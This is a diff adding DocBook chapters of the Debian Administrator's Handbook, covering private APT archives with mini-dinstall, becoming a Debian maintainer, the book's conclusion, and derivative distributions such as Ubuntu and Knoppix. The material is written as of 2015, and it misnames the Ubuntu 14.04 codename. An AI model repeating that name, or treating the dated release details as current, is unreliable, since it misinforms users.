+    the version of the package (<filename>*.deb</filename>,
+    <filename>*.dsc</filename>,
+    <filename>*.diff.gz</filename>/<filename>*.debian.tar.gz</filename>,
+    <filename>*.orig.tar.gz</filename>, or their equivalents with other
+    compression tools), and these allow <command>mini-dinstall</command> to
+    know which files to install. <filename>*.changes</filename> files also
+    contain the name of the target distribution (often
+    <literal>unstable</literal>) mentioned in the latest
+    <filename>debian/changelog</filename> entry, and
+    <command>mini-dinstall</command> uses this information to decide where
+    the package should be installed. This is why administrators must always
+    change this field before building a package, and set it to
+    <literal>internal</literal> or <literal>updates</literal>, depending on
+    the target location. <command>mini-dinstall</command> then generates
+    the files required by APT, such as
+    <filename>Packages.gz</filename>.</para>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> <command>apt-ftparchive</command></title>
+      <indexterm><primary><command>apt-ftparchive</command></primary></indexterm>
+
+      <para>If <command>mini-dinstall</command> seems too complex for your
+      Debian archive needs, you can also use the
+      <command>apt-ftparchive</command> command. This tool scans the
+      contents of a directory and displays (on its standard output) a
+      matching <filename>Packages</filename> file. In the Falcot Corp case,
+      administrators could upload the packages directly into
+      <filename>/srv/vhosts/packages/updates/</filename> or
+      <filename>/srv/vhosts/packages/internal/</filename>, then run the
+      following commands to create the <filename>Packages.gz</filename>
+      files:</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>cd /srv/vhosts/packages</userinput>
+<computeroutput>$ </computeroutput><userinput>apt-ftparchive packages updates &gt;updates/Packages</userinput>
+<computeroutput>$ </computeroutput><userinput>gzip updates/Packages</userinput>
+<computeroutput>$ </computeroutput><userinput>apt-ftparchive packages internal &gt;internal/Packages</userinput>
+<computeroutput>$ </computeroutput><userinput>gzip internal/Packages</userinput>
+</screen>
+
+      <para>The <command>apt-ftparchive sources</command> command allows
+      creating <filename>Sources.gz</filename> files in a similar
+      fashion.</para>
+    </sidebar>
+
+    <para>Configuring <command>mini-dinstall</command> requires setting up
+    a <filename>~/.mini-dinstall.conf</filename> file; in the Falcot Corp
+    case, the contents are as follows:</para>
+
+    <programlisting>
+[DEFAULT]
+archive_style = flat
+archivedir = /srv/vhosts/packages
+
+verify_sigs = 0
+mail_to = admin@falcot.com
+
+generate_release = 1
+release_origin = Falcot Corp
+release_codename = stable
+
+[updates]
+release_label = Recompiled Debian Packages
+
+[internal]
+release_label = Internal Packages
+</programlisting>
+
+    <para>One decision worth noting is the generation of
+    <filename>Release</filename> files for each archive. This can help
+    manage package installation priorities using the
+    <filename>/etc/apt/preferences</filename> configuration file (see
+    <xref linkend="sect.apt.priorities" /> for details).</para>
+
+    <sidebar>
+      <title><emphasis>SECURITY</emphasis> <command>mini-dinstall</command> and permissions</title>
+
+      <para>Since <command>mini-dinstall</command> has been designed to run
+      as a regular user, there's no need to run it as root. The easiest way
+      is to configure everything within the user account belonging to the
+      administrator in charge of creating the Debian packages. Since only
+      this administrator has the required permissions to put files in the
+      <filename>incoming/</filename> directory, we can deduce that the
+      administrator authenticated the origin of each package prior to
+      deployment and <command>mini-dinstall</command> does not need to do
+      it again. This explains the <literal>verify_sigs = 0</literal>
+      parameter (which means that signatures need not be verified).
+      However, if the contents of packages are sensitive, we can reverse
+      the setting and elect to authenticate with a keyring containing the
+      public keys of persons allowed to create packages (configured with
+      the <literal>extra_keyrings</literal> parameter);
+      <command>mini-dinstall</command> will then check the origin of each
+      incoming package by analyzing the signature integrated to the
+      <filename>*.changes</filename> file.</para>
+    </sidebar>
+
+    <para>Invoking <command>mini-dinstall</command> actually starts a
+    daemon in the background. As long as this daemon runs, it will check
+    for new packages in the <filename>incoming/</filename> directory every
+    half-hour; when a new package arrives, it will be moved to the archive
+    and the appropriate <filename>Packages.gz</filename> and
+    <filename>Sources.gz</filename> files will be regenerated. If running a
+    daemon is a problem, <command>mini-dinstall</command> can also be
+    manually invoked in batch mode (with the <literal>-b</literal> option)
+    every time a package is uploaded into the
+    <filename>incoming/</filename> directory. Other possibilities provided
+    by <command>mini-dinstall</command> are documented in its
+    <citerefentry><refentrytitle>mini-dinstall</refentrytitle>
+    <manvolnum>1</manvolnum></citerefentry> manual page.</para>
+
+    <sidebar>
+      <title><emphasis>EXTRA</emphasis> Generating a signed archive</title>
+
+      <para>The APT suite checks a chain of cryptographic signatures on the
+      packages it handles before installing them, in order to ensure
+      their authenticity (see <xref linkend="sect.package-authentication" />). Private APT archives can
+      then be a problem, since the machines using them will keep displaying
+      warnings about unsigned packages. A diligent administrator will
+      therefore integrate private archives with the secure APT
+      mechanism.</para>
+
+      <para>To help with this process, <command>mini-dinstall</command>
+      includes a <literal>release_signscript</literal> configuration option
+      that allows specifying a script to use for generating the signature.
+      A good starting point is the <filename>sign-release.sh</filename>
+      script provided by the <emphasis role="pkg">mini-dinstall</emphasis>
+      package in
+      <filename>/usr/share/doc/mini-dinstall/examples/</filename>; local
+      changes may be relevant.</para>
+    </sidebar>
+  </section>
+  <section id="sect.becoming-package-maintainer">
+    <title>Becoming a Package Maintainer</title>
+    <section>
+      <title>Learning to Make Packages</title>
+
+      <para>Creating a quality Debian package is not always a simple task,
+      and becoming a package maintainer takes some learning, both with
+      theory and practice. It's not a simple matter of building and
+      installing software; rather, the bulk of the complexity comes from
+      understanding the problems and conflicts, and more generally the
+      interactions, with the myriad of other packages available.</para>
+      <section>
+        <title>Rules</title>
+
+	<para>A Debian package must comply with the precise rules compiled
+	in the Debian policy, and each package maintainer must know them.
+	There is no requirement to know them by heart, but rather to know
+	they exist and to refer to them whenever a choice presents a
+	non-trivial alternative. Every Debian maintainer has made mistakes
+	by not knowing about a rule, but this is not a huge problem as long 
+	as the error gets fixed when a user reports it as a bug report (which
+        tends to happen fairly soon thanks to advanced users).
+        <ulink type="block" url="https://www.debian.org/doc/debian-policy/" /></para>
+      </section>
+      <section>
+        <title>Procedures</title>
+        <indexterm><primary>Debian Developer's Reference</primary></indexterm>
+
+	<para>Debian is not a simple collection of individual packages.
+	Everyone's packaging work is part of a collective project; being a
+	Debian developer involves knowing how the Debian project operates
+	as a whole. Every developer will, sooner or later, interact with
+	others. The Debian Developer's Reference (in the <emphasis role="pkg">developers-reference</emphasis> package) summarizes what
+	every developer must know in order to interact as smoothly as
+	possible with the various teams within the project, and to take the
+	best possible advantages of the available resources. This document
+	also enumerates a number of duties a developer is expected to
+	fulfill. <ulink type="block" url="https://www.debian.org/doc/manuals/developers-reference/" /></para>
+      </section>
+      <section>
+        <title>Tools</title>
+
+	<para>Many tools help package maintainers in their work. This
+	section describes them quickly, but does not give the full details,
+	since they all have comprehensive documentation of their
+	own.</para>
+        <section>
+          <title>The <command>lintian</command> Program</title>
+          <indexterm><primary><command>lintian</command></primary></indexterm>
+
+	  <para>This tool is one of the most important: it's the Debian
+	  package checker. It is based on a large array of tests created
+	  from the Debian policy, and detects quickly and automatically
+	  many errors that can then be fixed before packages are
+	  released.</para>
+
+	  <para>This tool is only a helper, and it sometimes gets it wrong
+	  (for instance, since the Debian policy changes over time,
+	  <command>lintian</command> is sometimes outdated). It is also not
+	  exhaustive: not getting any Lintian error should not be
+	  interpreted as a proof that the package is perfect; at most, it
+	  avoids the most common errors.</para>
+        </section>
+        <section>
+          <title>The <command>piuparts</command> Program</title>
+          <indexterm><primary><command>piuparts</command></primary></indexterm>
+
+	  <para>This is another important tool: it automates the
+	  installation, upgrade, removal and purge of a package (in an
+	  isolated environment), and checks that none of these
+	  operations leads to an error.  It can help in detecting
+	  missing dependencies, and it also detects when files are
+	  incorrectly left over after the package got purged.</para>
+        </section>
+        <section>
+          <title>devscripts</title>
+          <indexterm><primary><emphasis role="pkg">devscripts</emphasis></primary></indexterm>
+          <indexterm><primary><command>debuild</command></primary></indexterm>
+          <indexterm><primary><command>dch</command></primary></indexterm>
+          <indexterm><primary><command>uscan</command></primary></indexterm>
+          <indexterm><primary><command>debi</command></primary></indexterm>
+          <indexterm><primary><command>debc</command></primary></indexterm>
+
+	  <para>The <emphasis role="pkg">devscripts</emphasis> package
+	  contains many programs helping with a wide array of a Debian
+	  developer's job:</para>
+          <itemizedlist>
+            <listitem>
+	      <para><command>debuild</command> allows generating a package
+	      (with <command>dpkg-buildpackage</command>) and running
+	      <command>lintian</command> to check its compliance with the
+	      Debian policy afterwards.</para>
+            </listitem>
+            <listitem>
+	      <para><command>debclean</command> cleans a source package
+	      after a binary package has been generated.</para>
+            </listitem>
+            <listitem>
+	      <para><command>dch</command> allows quick and easy editing of
+	      a <filename>debian/changelog</filename> file in a source
+	      package.</para>
+            </listitem>
+            <listitem>
+	      <para><command>uscan</command> checks whether a new version
+	      of a software has been released by the upstream author; this
+	      requires a <filename>debian/watch</filename> file with a
+	      description of the location of such releases.</para>
+            </listitem>
+            <listitem>
+	      <para><command>debi</command> allows installing (with
+	      <command>dpkg -i</command>) the Debian package that was just
+	      generated without the need to type its full name and path.</para>
+            </listitem>
+            <listitem>
+	      <para>In a similar fashion, <command>debc</command> allows
+	      scanning the contents of the recently-generated package (with
+	      <command>dpkg -c</command>), without needing to type its full
+	      name and path.</para>
+            </listitem>
+            <listitem>
+	      <para><command>bts</command> controls the bug tracking system
+	      from the command line; this program automatically generates
+	      the appropriate emails.</para>
+            </listitem>
+            <listitem>
+	      <para><command>debrelease</command> uploads a
+	      recently-generated package to a remote server, without
+	      needing to type the full name and path of the related
+	      <filename>.changes</filename> file.</para>
+            </listitem>
+            <listitem>
+	      <para><command>debsign</command> signs the
+	      <filename>*.dsc</filename> and <filename>*.changes</filename>
+	      files.</para>
+            </listitem>
+            <listitem>
+	      <para><command>uupdate</command> automates the creation of a
+	      new revision of a package when a new upstream version has
+	      been released.</para>
+            </listitem>
+          </itemizedlist>
+        </section>
+        <section>
+          <title><emphasis role="pkg">debhelper</emphasis> and <emphasis role="pkg">dh-make</emphasis></title>
+          <indexterm><primary><emphasis>debhelper</emphasis></primary></indexterm>
+          <indexterm><primary><emphasis>dh-make</emphasis></primary></indexterm>
+
+	  <para>Debhelper is a set of scripts easing the creation of
+	  policy-compliant packages; these scripts are invoked from
+	  <filename>debian/rules</filename>. Debhelper has been widely
+	  adopted within Debian, as evidenced by the fact that it is used
+	  by the majority of official Debian packages. All the commands it
+          contains have a <command>dh_</command> prefix.</para>
+
+	  <para>The <command>dh_make</command> script (in the
+	  <emphasis>dh-make</emphasis> package) creates files required for
+	  generating a Debian package in a directory initially containing
+	  the sources for a piece of software. As can be guessed from the
+	  name of the program, the generated files use debhelper by
+	  default.</para>
+        </section>
+        <section>
+          <title><command>dupload</command> and <command>dput</command></title>
+          <indexterm><primary><command>dupload</command></primary></indexterm>
+          <indexterm><primary><command>dput</command></primary></indexterm>
+
+	  <para>The <command>dupload</command> and <command>dput</command>
+	  commands allow uploading a Debian package to a (possibly remote)
+	  server. This allows developers to publish their package on the
+	  main Debian server (<literal>ftp-master.debian.org</literal>) so
+	  that it can be integrated to the archive and distributed by
+	  mirrors. These commands take a <filename>*.changes</filename>
+	  file as a parameter, and deduce the other relevant files from its
+	  contents.</para>
+        </section>
+      </section>
+    </section>
+    <section>
+      <title>Acceptance Process</title>
+
+      <para>Becoming a “Debian developer” is not a simple administrative
+      matter. The process comprises several steps, and is as much an
+      initiation as it is a selection process. In any case, it is
+      formalized and well-documented, so anyone can track their progression
+      on the website dedicated to the new member process.
+      <ulink type="block" url="https://nm.debian.org/" /></para>
+
+      <sidebar>
+        <title><emphasis>EXTRA</emphasis> Lightweight process for “Debian Maintainers”</title>
+
+        <para>“Debian Maintainer” is another status that gives less
+          privileges than “Debian developer” but whose associated process
+          is quicker. With this status, the contributors can maintain
+          their own packages only. A Debian developer only needs to perform
+          a check on an initial upload, and issue a statement to the
+          effect that they trust the prospective maintainer with the
+          ability to maintain the package on their own.
+        </para>
+        <indexterm><primary>Debian Maintainer</primary></indexterm>
+      </sidebar>
+      <section>
+        <title>Prerequisites</title>
+
+	<para>All candidates are expected to have at least a working
+	knowledge of the English language. This is required at all levels:
+	for the initial communications with the examiner, of course, but
+	also later, since English is the preferred language for most of the
+	documentation; also, package users will be communicating in English
+	when reporting bugs, and they will expect replies in
+	English.</para>
+
+	<para>The other prerequisite deals with motivation. Becoming a
+	Debian developer is a process that only makes sense if the
+	candidate knows that their interest in Debian will last for many
+	months. The acceptance process itself may last for several months,
+	and Debian needs developers for the long haul; each package needs
+	permanent maintenance, and not just an initial upload.</para>
+      </section>
+      <section>
+        <title>Registration</title>
+
+	<para>The first (real) step consists in finding a sponsor or
+	advocate; this means an official developer willing to state that
+	they believe that accepting <emphasis>X</emphasis> would be a good
+	thing for Debian. This usually implies that the candidate has
+	already been active within the community, and that their work has
+	been appreciated. If the candidate is shy and their work is not
+	publicly touted, they can try to convince a Debian developer to
+	advocate them by showing their work in a private way.</para>
+
+        <indexterm><primary>key pair</primary></indexterm>
+	<para>At the same time, the candidate must generate a
+	public/private RSA key pair with GnuPG, which should be signed
+	by at least two official Debian developers. The signature
+	authenticates the name on the key. Effectively, during a key
+	signing party, each participant must show an official
+	identification (usually an ID card or passport) together with
+	their key identifiers. This step confirms the link between the
+	human and the keys. This signature thus requires
+	meeting in real life.  If you have not yet met any Debian
+	developers in a public free software conference, you can
+	explicitly seek developers living nearby using the list on the
+	following webpage as a starting point.  <ulink type="block" url="https://wiki.debian.org/Keysigning" /></para>
+
+	<para>Once the registration on <literal>nm.debian.org</literal> has
+	been validated by the advocate, an <emphasis>Application
+	Manager</emphasis> is assigned to the candidate. The application
+	manager will then drive the process through multiple pre-defined
+	steps and checks.</para>
+
+	<para>The first verification is an identity check. If you already
+	have a key signed by two Debian developers, this step is easy;
+	otherwise, the application manager will try and guide you in your
+	search for Debian developers close by to organize a meet-up and a
+	key signing.</para>
+      </section>
+      <section>
+        <title>Accepting the Principles</title>
+
+	<para>These administrative formalities are followed by
+	philosophical considerations. The point is to make sure that the
+	candidate understands and accepts the social contract and the
+	principles behind Free Software. Joining Debian is only possible if
+	one shares the values that unite the current developers, as
+	expressed in the founding texts (and summarized in <xref linkend="the-debian-project" />).</para>
+
+	<para>In addition, each candidate wishing to join the Debian ranks is
+	expected to know the workings of the project, and how to interact
+	appropriately to solve the problems they will doubtless encounter
+	as time passes. All of this information is generally documented in
+	manuals targeting the new maintainers, and in the Debian
+	developer's reference. An attentive reading of this document should
+	be enough to answer the examiner's questions. If the answers are
+	not satisfactory, the candidate will be informed. They will then have
+	to read (again) the relevant documentation before trying again. In
+	the cases where the existing documentation does not contain the
+	appropriate answer for the question, the candidate can usually
+	reach an answer with some practical experience within Debian, or
+	potentially by discussing with other Debian developers. This
+	mechanism ensures that candidates get involved somewhat in Debian
+	before becoming a full part of it. It is a deliberate policy, by
+	which candidates who eventually join the project are integrated as
+	another piece of an infinitely extensible jigsaw puzzle.</para>
+
+        <indexterm><primary><emphasis>Philosophy &amp; Procedures</emphasis></primary></indexterm>
+	<para>This step is usually known as the <emphasis>Philosophy &amp;
+	Procedures</emphasis> (P&amp;P for short) in the lingo of the
+	developers involved in the new member process.
+	</para>
+      </section>
+      <section>
+        <title>Checking Skills</title>
+
+	<para>Each application to become an official Debian developer must
+	be justified. Becoming a project member requires showing that this
+	status is legitimate, and that it facilitates the candidate's job
+	in helping Debian. The most common justification is that being
+	granted Debian developer status eases maintenance of a Debian
+	package, but it is not the only one. Some developers join the
+	project to contribute to porting to a specific architecture, others
+	want to improve documentation, and so on.</para>
+
+	<para>This step represents the opportunity for the candidate to
+	state what they intend to do within the Debian project and to show
+	what they have already done towards that end. Debian is a pragmatic
+	project and saying something is not enough, if the actions do not
+	match what is announced. Generally, when the intended role within
+	the project is related to package maintenance, a first version of
+	the prospective package will have to be validated technically and
+	uploaded to the Debian servers by a sponsor among the existing
+	Debian developers.</para>
+
+        <sidebar>
+          <title><emphasis>COMMUNITY</emphasis> Sponsoring</title>
+          <indexterm><primary>sponsoring</primary></indexterm>
+
+	  <para>Debian developers can “sponsor” packages prepared by
+	  someone else, meaning that they publish them in the official
+	  Debian repositories after having performed a careful review. This
+	  mechanism enables external persons, who have not yet gone
+	  through the new member process, to contribute occasionally to
+	  the project. At the same time, it ensures that all packages
+	  included in Debian have always been checked by an official
+	  member.</para>
+        </sidebar>
+
+	<para>Finally, the examiner checks the candidate's technical
+	(packaging) skills with a detailed questionnaire. Bad answers are
+	not permitted, but the answer time is not limited. All the
+	documentation is available and several tries are allowed if the
+	first answers are not satisfactory. This step does not intend to
+	discriminate, but to ensure at least a modicum of knowledge common
+	to new contributors.</para>
+
+        <indexterm><primary><emphasis>Tasks &amp; Skills</emphasis></primary></indexterm>
+	<para>This step is known as the <emphasis>Tasks &amp;
+	Skills</emphasis> step (T&amp;S for short) in the examiners'
+	jargon.</para>
+      </section>
+      <section>
+        <title>Final Approval</title>
+
+	<para>At the very last step, the whole process is reviewed by a DAM
+	(<emphasis>Debian Account Manager</emphasis>). The DAM will review
+	all the information about the candidate that the examiner
+	collected, and makes the decision on whether or not to create an
+	account on the Debian servers. In cases where extra information is
+	required, the account creation may be delayed. Refusals are rather
+	rare if the examiner does a good job of following the process, but
+	they sometimes happen. They are never permanent, and the candidate
+	is free to try again at a later time.</para>
+
+	<para>The DAM's decision is authoritative and (almost) without
+        appeal, which explains why the people in that seat have often been
+        criticized in the past.</para>
+      </section>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/70_conclusion.xml b/tmp/cs-CZ/xml_tmp/70_conclusion.xml
new file mode 100644
index 000000000..84e20a005
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/70_conclusion.xml
@@ -0,0 +1,132 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="conclusion">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-conclusion.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Future</keyword>
+      <keyword>Improvements</keyword>
+      <keyword>Opinions</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Conclusion: Debian's Future</title>
+  <highlights>
+    <para>The story of Falcot Corp ends with this last chapter; but Debian
+    lives on, and the future will certainly bring many interesting
+    surprises.</para>
+  </highlights>
+  <section id="sect.upcoming-developments">
+    <title>Upcoming Developments</title>
+
+    <para>Weeks (or months) before a new version of Debian is released, the
+    Release Manager picks the codename for the next version. Now that
+    Debian version 8 is out, the developers are already busy working on
+    the next version, codenamed <emphasis role="distribution">Stretch</emphasis>…</para>
+
+    <para>There is no official list of planned changes, and Debian never
+    makes promises relating to technical goals of the coming versions.
+    However, a few development trends can already be noted, and we can try
+    some bets on what might happen (or not).</para>
+
+    <para>In order to improve security and trust, most if not all the
+    packages will be made to build reproducibly; that is to say, it
+    will be possible to rebuild byte-for-byte identical binary
+    packages from the source packages, thus allowing everyone to
+    verify that no tampering has happened during the builds.</para>
+
+    <para>In a related theme, a lot of effort will have gone into
+    improving security by default, and mitigating both “traditional”
+    attacks and the new threats implied by mass surveillance.</para>
+
+    <para>Of course, all the main software suites will have had a
+    major release.  The latest version of the various desktops will
+    bring better usability and new features.  Wayland, the new display
+    server that is being developed to replace X11 with a more modern
+    alternative, will be available (although maybe not default) for at
+    least some desktop environments.
+    </para>
+
+    
+
+    <para>A new feature of the archive maintenance software,
+    “bikesheds”, will allow developers to host special-purpose package
+    repositories in addition to the main repositories; this will allow
+    for personal package repositories, repositories for software not
+    ready to go into the main archive, repositories for software that
+    has only a very small audience, temporary repositories for testing
+    new ideas, and so on.</para>
+
+  </section>
+  <section id="sect.future-of-debian">
+    <title>Debian's Future</title>
+
+    <para>In addition to these internal developments, one can reasonably
+    expect new Debian-based distributions to come to light, as many
+    tools keep making this task easier. New specialized
+    subprojects will also be started, in order to widen Debian's reach to
+    new horizons.</para>
+
+    <para>The Debian user community will increase, and new contributors
+    will join the project… including, maybe, you!</para>
+
+    <para>The Debian project is stronger than ever, and well on its way
+    towards its goal of a universal distribution; the inside joke within
+    the Debian community is about <foreignphrase>World
+    Domination</foreignphrase>.</para>
+
+    <para>In spite of its old age and its respectable size, Debian keeps on
+    growing in all kinds of (sometimes unexpected) directions. Contributors
+    are teeming with ideas, and discussions on development mailing lists,
+    even when they look like bickerings, keep increasing the momentum.
+    Debian is sometimes compared to a black hole, of such density that any
+    new free software project is attracted.</para>
+
+    <para>Beyond the apparent satisfaction of most Debian users, a deep
+    trend is becoming more and more indisputable: people are increasingly
+    realising that collaborating, rather than working alone in their corner, leads to
+    better results for everyone. Such is the rationale used by
+    distributions merging into Debian by way of subprojects.</para>
+
+    <para>The Debian project is therefore not threatened by
+    extinction…</para>
+  </section>
+  <section id="sect.future-of-this-book">
+    <title>Future of this Book</title>
+
+    <para>We would like this book to evolve in the spirit of free software.
+    We therefore welcome contributions, remarks, suggestions, and
+    criticism. Please direct them to Raphaël
+    (<email>hertzog@debian.org</email>) or Roland
+    (<email>lolando@debian.org</email>). For actionable feedback,
+    feel free to open bug reports against the <literal>debian-handbook</literal>
+    Debian package. The website will be used to gather
+    all information relevant to its evolution, and you will find there
+    information on how to contribute, in particular if you want
+    to translate this book to make it available to an even
+    larger public than today.
+    <ulink type="block" url="http://debian-handbook.info/" /></para>
+
+    <para>We tried to integrate most of what our experience at Debian
+    taught us, so that anyone can use this distribution and take the best
+    advantage of it as soon as possible. We hope this book contributes to
+    making Debian less confusing and more popular, and we welcome publicity
+    around it!</para>
+
+    <para>We would like to conclude on a personal note. Writing (and
+    translating) this book took a considerable amount of time out of our
+    usual professional activity. Since we are both freelance consultants,
+    any new source of income grants us the freedom to spend more time
+    improving Debian; we hope this book to be successful and to contribute
+    to this. In the meantime, feel free to retain our services!
+    <ulink type="block" url="http://www.freexian.com" />
+    <ulink type="block" url="http://www.gnurandal.com" />
+    </para>
+
+    <para>See you soon!</para>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/90_derivative-distributions.xml b/tmp/cs-CZ/xml_tmp/90_derivative-distributions.xml
new file mode 100644
index 000000000..a4df14e32
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/90_derivative-distributions.xml
@@ -0,0 +1,292 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="derivative-distributions">
+  <appendixinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-derivative-distributions.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Live CD</keyword>
+      <keyword>Specificities</keyword>
+      <keyword>Particular Choices</keyword>
+    </keywordset>
+  </appendixinfo>
+  <title>Derivative Distributions</title>
+  <highlights>
+    <para><indexterm><primary>derivative distribution</primary></indexterm>
+    <indexterm><primary>distribution, derivative</primary></indexterm> Many
+    Linux distributions are derivatives of Debian and reuse Debian's
+    package management tools. They all have their own interesting
+    properties, and it is possible one of them will fulfill your needs
+    better than Debian itself.</para>
+  </highlights>
+  <section id="sect.derivative-census">
+    <title>Census and Cooperation</title>
+
+    <para>The Debian project fully acknowledges the importance of
+    derivative distributions and actively supports collaboration between
+    all involved parties. This usually involves merging back the
+    improvements initially developed by derivative distributions so that
+    everyone can benefit and long-term maintenance work is reduced.</para>
+
+    <para>This explains why derivative distributions are invited to become
+    involved in discussions on the
+    <literal>debian-derivatives@lists.debian.org</literal> mailing-list,
+    and to participate in the derivative census. This census aims at
+    collecting information on work happening in a derivative so that
+    official Debian maintainers can better track the state of their package
+    in Debian variants. <ulink type="block" url="https://wiki.debian.org/DerivativesFrontDesk" /><ulink type="block" url="https://wiki.debian.org/Derivatives/Census" /></para>
+
+    <para>Let us now briefly describe the most interesting and popular
+    derivative distributions.</para>
+  </section>
+  <section id="sect.ubuntu">
+    <title>Ubuntu</title>
+    <indexterm><primary>Ubuntu</primary></indexterm>
+
+    <para>Ubuntu made quite a splash when it came on the Free Software
+    scene, and for good reason: Canonical Ltd., the company that created
+    this distribution, started by hiring thirty-odd Debian developers and
+    publicly stating the far-reaching objective of providing a
+    distribution for the general public with a new release twice a year.
+    They also committed to maintaining each version for a year and a half.
+    </para>
+
+    <para>These objectives necessarily involve a reduction in scope; Ubuntu
+    focuses on a smaller number of packages than Debian, and relies
+    primarily on the GNOME desktop (although an official Ubuntu derivative,
+    called “Kubuntu”, relies on KDE Plasma). Everything is internationalized and
+    made available in a great many languages.</para>
+    <indexterm><primary>Kubuntu</primary></indexterm>
+
+    <para>So far, Ubuntu has managed to keep this release rhythm. They
+    also publish <emphasis>Long Term Support</emphasis> (LTS)
+    releases, with a 5-year maintenance promise. As of April 2015, the
+    current LTS version is version 14.04, nicknamed Utopic
+    Unicorn. The last non-LTS version is version 15.04, nicknamed
+    Vivid Vervet. Version numbers describe the release date: 15.04,
+    for example, was released in April 2015.</para>
+
+    <sidebar>
+      <title><emphasis>IN PRACTICE</emphasis> Ubuntu's support and maintenance promise</title>
+      <indexterm><primary><literal>main</literal></primary></indexterm>
+      <indexterm><primary><literal>restricted</literal></primary></indexterm>
+      <indexterm><primary><literal>universe</literal></primary></indexterm>
+      <indexterm><primary><literal>multiverse</literal></primary></indexterm>
+
+      <para>Canonical has adjusted multiple times the rules governing
+      the length of the period during which a given release is
+      maintained. Canonical, as a company, promises to provide security
+      updates to all the software available in the <literal>main</literal>
+      and <literal>restricted</literal> sections of the Ubuntu archive, for
+      5 years for LTS releases and for 9 months for non-LTS releases.
+      Everything else (available in the <literal>universe</literal>
+      and <literal>multiverse</literal>) is maintained on a best-effort
+      basis by volunteers of the MOTU team (<emphasis>Masters Of The
+      Universe</emphasis>). Be prepared to handle security support yourself
+      if you rely on packages of the latter sections.</para>
+    </sidebar>
+
+    <para>Ubuntu has reached a wide audience in the general public.
+    Millions of users were impressed by its ease of installation, and the
+    work that went into making the desktop simpler to use.</para>
+
+    <para>Ubuntu and Debian used to have a tense relationship; Debian
+    developers who had placed great hopes in Ubuntu contributing
+    directly to Debian were disappointed by the difference between the
+    Canonical marketing, which implied Ubuntu were good citizens in
+    the Free Software world, and the actual practice where they simply
+    made public the changes they applied to Debian packages.  Things
+    have been getting better over the years, and Ubuntu has now made
+    it general practice to forward patches to the most appropriate
+    place (although this only applies to external software they
+    package and not to the Ubuntu-specific software such as Mir or
+    Unity). <ulink type="block" url="http://www.ubuntu.com/" /></para>
+  </section>
+  <section id="sect.linux-mint">
+    <title>Linux Mint</title>
+    <indexterm><primary>Linux Mint</primary></indexterm>
+
+    <para>Linux Mint is a (partly) community-maintained distribution,
+    supported by donations and advertisements. Their flagship product is
+    based on Ubuntu, but they also provide a “Linux Mint Debian Edition”
+    variant that evolves continuously (as it is based on Debian Testing).
+    In both cases, the initial installation involves booting a
+    LiveDVD.</para>
+
+    <para>The distribution aims at simplifying access to advanced
+    technologies, and provides specific graphical user interfaces on
+    top of the usual software. For instance, Linux Mint relies on Cinnamon
+    instead of GNOME by default (but it also includes MATE as well
+    as Plasma and Xfce); similarly, the package management
+    interface, although based on APT, provides a specific interface
+    with an evaluation of the risk from each package update.</para>
+
+    <para>Linux Mint includes a large amount of proprietary software
+    to improve the experience of users who might need those. For
+    example: Adobe Flash and multimedia codecs.  <ulink type="block" url="http://www.linuxmint.com/" /></para>
+  </section>
+
+  <section id="sect.knoppix">
+    <title>Knoppix</title>
+    <indexterm><primary><foreignphrase>LiveCD</foreignphrase></primary></indexterm>
+    <indexterm><primary>Knoppix</primary></indexterm>
+    <indexterm><primary>bootable CD-ROM</primary></indexterm>
+    <indexterm><primary>CD-ROM</primary><secondary>bootable</secondary></indexterm>
+   
+    <para>The Knoppix distribution barely needs an introduction. It
+    was the first popular distribution to provide a
+    <emphasis>LiveCD</emphasis>; in other words, a bootable CD-ROM
+    that runs a turn-key Linux system with no requirement for a
+    hard-disk — any system already installed on the machine will be
+    left untouched. Automatic detection of available devices allows
+    this distribution to work in most hardware configurations. The
+    CD-ROM includes almost 2 GB of (compressed) software, and the
+    DVD-ROM version has even more.</para>
+
+    <para>Combining this CD-ROM to a USB stick allows carrying your
+    files with you, and to work on any computer without leaving a
+    trace — remember that the distribution doesn't use the hard-disk
+    at all.  Knoppix uses LXDE (a lightweight graphical desktop) by
+    default, but the DVD version also includes GNOME and Plasma.  Many
+    other distributions provide other combinations of desktops and
+    software. This is, in part, made possible thanks to the <emphasis role="pkg">live-build</emphasis> Debian package that makes it
+    relatively easy to create a LiveCD. <ulink type="block" url="http://live.debian.net/" /></para>
+    <indexterm><primary><emphasis role="pkg">live-build</emphasis></primary></indexterm>
+
+    <para>Note that Knoppix also provides an installer: you can first try
+    the distribution as a LiveCD, then install it on a hard-disk to get
+    better performance. <ulink type="block" url="http://www.knopper.net/knoppix/index-en.html" /></para>
+  </section>
+
+  <section id="sect.aptosid">
+    <title>Aptosid and Siduction</title>
+    <indexterm><primary>Sidux</primary></indexterm>
+    <indexterm><primary>Aptosid</primary></indexterm> 
+    <indexterm><primary>Siduction</primary></indexterm> 
+
+    <para>These community-based distributions track the changes in
+    Debian <emphasis role="distribution">Sid</emphasis> (<emphasis role="distribution">Unstable</emphasis>) — hence their name. The
+    modifications are limited in scope: the goal is to provide the
+    most recent software and to update drivers for the most recent
+    hardware, while still allowing users to switch back to the
+    official Debian distribution at any time. Aptosid was previously
+    known as Sidux, and Siduction is a more recent fork of
+    Aptosid.
+    <ulink type="block" url="http://aptosid.com" />
+    <ulink type="block" url="http://siduction.org" /></para>
+  </section>
+
+  <section id="sect.grml">
+    <title>Grml</title>
+    <indexterm><primary>Grml</primary></indexterm>
